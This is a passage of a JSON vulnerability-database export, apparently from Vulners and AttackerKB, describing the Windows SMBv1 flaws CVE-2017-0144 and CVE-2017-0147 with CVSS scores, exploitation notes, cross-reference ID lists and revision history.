"SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", 
"THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-07-20T20:10:58", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-07-20T20:10:58", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Advisory": ["https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", 
"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth"], "mitre_vector": {"Initial Access": ["Exploit Public-Facing Application(Validated)"], "Lateral Movement": ["Remote Services(Validated)"]}, "last_activity": "2021-01-27T09:26:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "f3f172d109ebf206391628f4241045e7"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "6e0b7952dde138a784afb955c0264daf"}, {"key": "href", "hash": "77e144ca40ee58b38f8310032f97520a"}, {"key": "immutableFields", "hash": 
"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "33304c5ad4f24166080d70e5d2fa6357"}, {"key": "published", "hash": "0404a0b8374966187f59ed4a2b846395"}, {"key": "references", "hash": "127216f4a57b3845fca792aa41d3d054"}, {"key": "reporter", "hash": "5e5266bea17c39e5ee12abd5fcbf7c2b"}, {"key": "title", "hash": "d650c395d3b7dd2f2da9517bdf7ca6dc"}, {"key": "type", "hash": "dbbc8fce9a59d0a898c44c4f99244f4a"}], "scheme": null}, {"id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "hash": "7f7b33f7b3e9e93cbe9704552ddc5dfdff2fd192d2c729f117c9c1f6790c4091", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0147", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-07-20T20:12:25", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB 
Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-20T20:12:25", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": 
"mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": 
["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-07-20T20:12:25", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "cf4fad3835543f80b32592b67e4a64739d5ddd9cd732c8eebfd7ce9e98c36703", "hashmap": [{"hash": "0404a0b8374966187f59ed4a2b846395", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "33304c5ad4f24166080d70e5d2fa6357", "key": "modified"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "b981c43af3b615a415964e8db3de7b8e", "key": "href"}, {"hash": "9e3184b090a916875fe172879504df32", "key": "cvelist"}, {"hash": "76174974a44b129dc7cb9905e72bee93", "key": "description"}, {"hash": "5e5266bea17c39e5ee12abd5fcbf7c2b", "key": "reporter"}, {"hash": "39066d294b8fbf1c3a8cec09d69adbc3", "key": "references"}, {"hash": "dbbc8fce9a59d0a898c44c4f99244f4a", "key": "type"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "lastseen": "2021-07-20T20:12:25", "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", 
"http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "AttackerKB", "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 3}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-07-20T20:12:25"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-04-25T06:21:28", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-25T06:21:28", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "509fede319eb190aec4937fb25737550", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, 
"lastseen": "2021-04-25T06:21:28", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "references_categories"], "edition": 3, "lastseen": "2021-04-25T06:21:28"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability 
spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2020-11-22T06:09:46", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2020-11-22T06:09:46", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "8e4f5781a293b794a4c2cc0694040a2f", "history": [], "href": 
